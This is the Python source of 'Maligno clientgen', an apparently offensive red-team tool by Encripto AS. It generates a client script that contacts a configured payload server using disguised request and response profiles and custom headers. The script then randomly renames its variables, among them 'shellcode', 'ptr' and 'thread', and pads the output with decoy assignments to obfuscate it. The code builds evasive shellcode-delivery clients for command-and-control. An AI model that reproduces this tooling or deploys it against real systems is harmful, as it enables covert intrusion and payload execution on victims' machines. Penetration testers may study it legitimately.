#!/usr/bin/python

################################################################
#                                                              #
# Maligno clientgen                                            #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2014 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################



import re, os, getopt, sys, string, random, urllib
import xml.etree.ElementTree as ET

__version__ = "1.2"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


def header():
    os.system("clear")
    
    print ""
    print " ================================================================= "
    print "|  Maligno clientgen v{0}: Maligno client generator \t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""

    
def help():
    header()
    print """
   Usage: python clientgen.py [mandatory options]

   Mandatory options:
       -i  id           ...Payload ID to request from Maligno
       -f  file         ...Maligno server config file
       -o  file         ...Output file
        
   Example:
       python clientgen.py -i 0 -f server_config.xml -o my_client.py
    """
    sys.exit(0) 

    
def check_file_exists(filename):
    if not os.path.exists(filename):
        print "[-] File \"{0}\" cannot be found.\n".format(filename)
        sys.exit()
        

def get_server_config(config_file):
    check_file_exists(config_file)        
    tree = ET.parse(config_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Server"):    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Server>", config_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["addr"] or not config["port"] or not config["ssl"] or not config["sslcert"] or not config["proxy"] or not config["proxyport"] or not config["profile"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Server>", config_file)
        sys.exit()  
    
    return config

    
def get_profile_request_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    req = root.find("Server").find("Request")
    for child in req:    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Request>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["page"] or not config["parameter"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Request>", profile_file)
        sys.exit()  
    
    return config

    
def get_profile_response_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    resp = root.find("Server").find("Response")
    for child in resp:    
        if child.text and child.tag != "header" and child.tag != "body":
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Response>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["protocol"] or not config["banner"] or not config["lastresort"] or not config["errortemplate"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Response>", profile_file)
        sys.exit()  
    
    return config

    
def get_profile_network_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Network"):    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Network>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["encoding"] or not config["rounds"] or not config["blocksize"] or not config["paddingchar"] or not config["secret"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Network>", profile_file)
        sys.exit()  
    
    return config     
    
 
def get_profile_client_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Client"):    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Client>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["useragent"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Client>", profile_file)
        sys.exit()  
    
    return config 
 
 
def get_profile_client_header_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    tmp = []
    config = []
    resp = root.find("Client")
    for child in resp.findall("header"):    
        for c in child:
            tmp.append([c.tag, c.text])
           
        config.append(dict(tmp))
    
    return config
 
 
def get_client_template(template_file):
    try:
        fr = open(template_file, 'r')
        content = fr.read().splitlines()
        fr.close()
    
    except IOError:
        print "[-] Could not find {0}.".format(template_file)
        sys.exit()
    
    return content
    
 
def generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, payload_id):
    client_code = []
    for template_line in client_template:
        if template_line == "<ENCODING>":
            code_line = "encoding = \"" + profile_network_config["encoding"] + "\""
            
        elif template_line == "<ENCODINGROUNDS>":
            code_line = "encoding_rounds = " + profile_network_config["rounds"]
        
        elif template_line == "<RESPPREFIX>":
            resp_prefix = ""
            try: 
                resp_prefix = urllib.unquote(profile_response_config["prefix"])
        
            except KeyError:
                resp_prefix = ""
                
            code_line = "resp_prefix = \"" + resp_prefix + "\""

        elif template_line == "<RESPSUFFIX>":
            resp_suffix = ""
            try: 
                resp_suffix = urllib.unquote(profile_response_config["suffix"])
        
            except KeyError:
                resp_suffix = ""
                
            code_line = "resp_suffix = \"" + resp_suffix + "\""
        
        elif template_line == "<SECRET>":
            code_line = "secret = \"" + profile_network_config["secret"] + "\""
            
        elif template_line == "<REQPAGE>":
            code_line = "req_page = \"" + profile_request_config["page"] + "\""
        
        elif template_line == "<REQPARAM>":
            code_line = "req_param = \"" + profile_request_config["parameter"] + "\""
        
        elif template_line == "<URLPREFIX>":
            url_prefix = ""
            try: 
                url_prefix = urllib.unquote(profile_request_config["prefix"])
        
            except KeyError:
                url_prefix = ""
                
            code_line = "url_prefix = \"" + url_prefix + "\""
        
        elif template_line == "<URLSUFFIX>":
            url_suffix = ""
            try: 
                url_suffix = urllib.unquote(profile_request_config["suffix"])
        
            except KeyError:
                url_suffix = ""
                
            code_line = "url_suffix = \"" + url_suffix + "\""
        
        elif template_line == "<INDEX>":
            code_line = "payload_id = " + str(payload_id)
        
        elif template_line == "<SSL>":
            if server_config["ssl"] == "true" or server_config["ssl"] == "True":
                code_line = "ssl = True"
            else:
                code_line = "ssl = False"
                
        elif template_line == "<SRVADDR>":
            code_line = "server_addr = \"" + server_config["addr"] + "\""
        
        elif template_line == "<SRVPORT>":
            code_line = "server_port = \"" + server_config["port"] + "\""
        
        elif template_line == "<HEADERS>":
            code_line = "headers = { "
            if profile_client_header_config:
                    for header in profile_client_header_config:
                        if header:
                            code_line += "\"%s\" : \"%s\", " % (str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())
                            
                        else:
                            print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n"
                
            code_line += "\"User-Agent\" : \"%s\" }" % (profile_client_config["useragent"])
            
        elif template_line.startswith("#"):
            continue
        
        else:
            code_line = template_line
            
        client_code.append(code_line)
    
    return client_code

    
def generate_name(size=10, chars=string.ascii_uppercase +  string.ascii_lowercase):
    return ''.join(random.choice(chars) for _ in range(size))


def generate_extension():
    return random.choice(["aspx", "php", "html", "htm", "jsp", "nsf"])


def generate_encoding_type():
    return random.choice(["base64", "hex", "ascii", "plain"])
    
    
def obfuscate_client_code(client_code):
    
    table = { 
            "encoding" : generate_name(random.randint(5,20)), "encoding_rounds" : generate_name(random.randint(5,20)), 
            "secret" : generate_name(random.randint(5,20)), "req_page" : generate_name(random.randint(5,20)),
            "req_param" : generate_name(random.randint(5,20)), "url_prefix" : generate_name(random.randint(5,20)), 
            "url_suffix" : generate_name(random.randint(5,20)), "req_path" : generate_name(random.randint(5,20)),  
            "ctext" : generate_name(random.randint(5,20)), "resp_prefix" : generate_name(random.randint(5,20)),
            "resp_suffix" : generate_name(random.randint(5,20)),
            "payload_id" : generate_name(random.randint(5,20)), "ssl" : generate_name(random.randint(5,20)), 
            "server_addr" : generate_name(random.randint(5,20)), "server_port" : generate_name(random.randint(5,20)),
            "headers" : generate_name(random.randint(5,20)), "cipher" : generate_name(random.randint(5,20)), 
            "plaintext" : generate_name(random.randint(5,20)), "padding_char" : generate_name(random.randint(5,20)),
            "http_conn" : generate_name(random.randint(5,20)), "http_resp" : generate_name(random.randint(5,20)),
            "shellcode" : generate_name(random.randint(5,20)), "unpack_data" : generate_name(random.randint(5,20)), 
            "ptr" : generate_name(random.randint(5,20)), "bff" : generate_name(random.randint(5,20)),
            "thread" : generate_name(random.randint(5,20)), "__version__" : generate_name(random.randint(5,20)), 
            "total" : generate_name(random.randint(5,20)), "iter" : generate_name(random.randint(5,20)), 
            "has_slept" : generate_name(random.randint(5,20)), "nap_time" : generate_name(random.randint(5,20)), 
            }
    
    obfuscated_code = []
    for x in xrange(0, random.randint(5,20)):
        obfuscated_code.append("%s = %s" % (generate_name(random.randint(5,20)), str(random.randint(5,20))))
    
    reached = False
    for line in client_code:
        if line.startswith("def"):
            reached = True
   
        if not reached:
            for x in xrange(0, random.randint(0,10)):
                n = random.randint(0, 10000000) 
                if n % 11 == 7:
                    obfuscated_code.append("%s = \"%s.%s\"" % (generate_name(random.randint(5,20)), generate_name(random.randint(5,10)).lower(), 
                                                               generate_extension().lower()))
                elif n % 11 == 6:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), generate_name(random.randint(1, 10))))
                                
                elif n % 11 == 5:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(generate_name(32, string.hexdigits).lower())))
                
                elif n % 11 == 4:
                    obfuscated_code.append("%s = %s" % (generate_name(random.randint(5,20)), str(random.randint(5,20))))
                
                elif n % 11 == 3:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), str(random.randint(0,1024))))
                
                elif n % 11 == 2:
                    if n % 2:
                        obfuscated_code.append("%s = True" % (generate_name(random.randint(5,20))))
                    else:
                        obfuscated_code.append("%s = False" % (generate_name(random.randint(5,20))))
                
                elif n % 11 == 1:
                    obfuscated_code.append("%s = \"%s\"" % (generate_name(random.randint(5,20)), generate_encoding_type().lower()))
                    
                else:
                    obfuscated_code.append("%s = \"%s.%s.%s.%s\"" % 
                    (generate_name(random.randint(5,20)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1)), str(random.randrange(0, 255, 1))))
            
        for key, value in table.iteritems():
            line = line.replace(key, value, 999)
                
        if len(line) > 0:
            obfuscated_code.append(line)
        
    return obfuscated_code

    
def generate_client_file(client_code, output_file):
    try:
        fw = open(output_file, 'w')
        fw.write("#!/usr/bin/python\n")
        
        for line in client_code:
            fw.write(line + "\n")
            
        fw.close()
        
    except IOError:
        print "[-] Could not save client code in {0}.".format(output_file)
    
    return
    

if __name__ == '__main__':
    
    try:
        options, args = getopt.getopt(sys.argv[1:], "i:f:o:", ["index=", "file=", "output="])

    except getopt.GetoptError, err:
        header()
        print "[-] ERROR: {0}.\n".format(str(err))
        sys.exit(1)
    
    if not options:
        help()

    payload_id = None
    config_file = None
    output_file = None
    
    for opt, arg in options:
        if opt in ("-i"):
            payload_id = arg
        
        if opt in ("-f"):
            config_file = arg    
            
        if opt in ("-o"):
            output_file = arg  
    
    if not payload_id or not config_file or not output_file:
        header()
        print "[-] ERROR: You must provide all mandatory options.\n"
        sys.exit(1)
    
    
    header()

    print "[*] Reading server configuration file..."
    server_config = get_server_config(config_file)    
    
    print "[*] Reading profile..."
    profile_request_config = get_profile_request_config(server_config["profile"])
    profile_response_config = get_profile_response_config(server_config["profile"])
    profile_network_config = get_profile_network_config(server_config["profile"])
    profile_client_config = get_profile_client_config(server_config["profile"])
    profile_client_header_config = get_profile_client_header_config(server_config["profile"])
    
    print "[*] Reading client template..."
    client_template = get_client_template("maligno_client.template")
    
    print "[*] Generating client code..."
    client_code = generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, payload_id)
    
    print "[*] Obfuscating client code..."
    obfuscated_client_code = obfuscate_client_code(client_code)
    
    print "[*] Writing client code to file..."
    generate_client_file(obfuscated_client_code, output_file)
    
    print "[*] Finished!\n"
    sys.exit()